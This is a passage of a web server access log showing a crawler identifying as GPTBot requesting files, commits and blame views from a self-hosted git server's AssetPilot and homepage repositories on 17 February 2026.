74.7.227.38] [Length 10524] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker" -[17/Feb/2026:13:49:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/updateRecord.md" [Client 74.7.227.38] [Length 9631] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/updateRecord.md" -[17/Feb/2026:13:49:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?files=asset_pilot_docker" [Client 74.7.227.38] [Length 60703] [Gzip 8.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker" -[17/Feb/2026:13:49:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/updateRecord.md" [Client 74.7.227.38] [Length 19300] [Gzip 8.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/updateRecord.md" -[17/Feb/2026:13:49:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 19909] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/asset_pilot_docker.tar.gz" -[17/Feb/2026:13:49:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 11045] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv" -[17/Feb/2026:13:49:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" [Client 74.7.227.38] [Length 11682] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv" -[17/Feb/2026:13:49:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 13333] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker" -[17/Feb/2026:13:49:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 10911] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument" -[17/Feb/2026:13:49:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 72008] [Gzip 10.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/asset_pilot_docker.tar.gz" -[17/Feb/2026:13:49:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 451] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.gitignore" -[17/Feb/2026:13:49:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 19415] [Gzip 5.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app" -[17/Feb/2026:13:49:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 13633] [Gzip 4.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app" -[17/Feb/2026:13:49:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 11757] [Gzip 6.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.gitignore" -[17/Feb/2026:13:49:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Hero.tsx" -[17/Feb/2026:13:49:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Services.tsx" -[17/Feb/2026:13:49:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 3] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/lib64" -[17/Feb/2026:13:49:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 13526] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" -[17/Feb/2026:13:49:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 11559] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" -[17/Feb/2026:13:49:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 11544] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" -[17/Feb/2026:13:50:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 11546] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" -[17/Feb/2026:13:50:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 9966] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/lib64" -[17/Feb/2026:13:50:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 8207] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:13:50:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 2470] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/models.py" -[17/Feb/2026:13:50:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" [Client 74.7.227.38] [Length 10164] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" -[17/Feb/2026:13:50:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 3505] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/README.md" -[17/Feb/2026:13:50:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 15832] [Gzip 9.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/README.md" -[17/Feb/2026:13:50:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 17667] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/asset_pilot_orangepi.tar.gz" -[17/Feb/2026:13:50:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 66209] [Gzip 10.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/asset_pilot_orangepi.tar.gz" -[17/Feb/2026:13:50:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 277] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/normalizer" -[17/Feb/2026:13:50:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 255] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:13:50:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 257] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:13:50:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 10426] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:13:50:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 10429] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:13:50:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 10433] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/normalizer" -[17/Feb/2026:13:50:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9894] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/services/geminiService.ts" -[17/Feb/2026:13:50:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages/DCS.html" [Client 74.7.227.38] [Length 22717] [Gzip 7.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages" -[17/Feb/2026:13:50:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages/DCS.html" [Client 74.7.227.38] [Length 22717] [Gzip 7.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages" -[17/Feb/2026:13:50:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 10169] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:13:50:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 14875] [Gzip 8.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:13:50:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2ftemplates" [Client 74.7.227.38] [Length 32887] [Gzip 7.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates" -[17/Feb/2026:13:50:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 9919] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-1.conf" -[17/Feb/2026:13:50:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-6.conf" -[17/Feb/2026:13:50:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-4.conf" -[17/Feb/2026:13:50:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 9950] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-4.conf" -[17/Feb/2026:13:50:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 9941] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-2.conf" -[17/Feb/2026:13:50:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 9947] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-1.conf" -[17/Feb/2026:13:50:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages/DCS.html" [Client 74.7.227.38] [Length 25662] [Gzip 12.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages/DCS.html" -[17/Feb/2026:13:50:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages/DCS.html" [Client 74.7.227.38] [Length 21975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages/DCS.html" -[17/Feb/2026:13:50:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages/DCS.html" [Client 74.7.227.38] [Length 25662] [Gzip 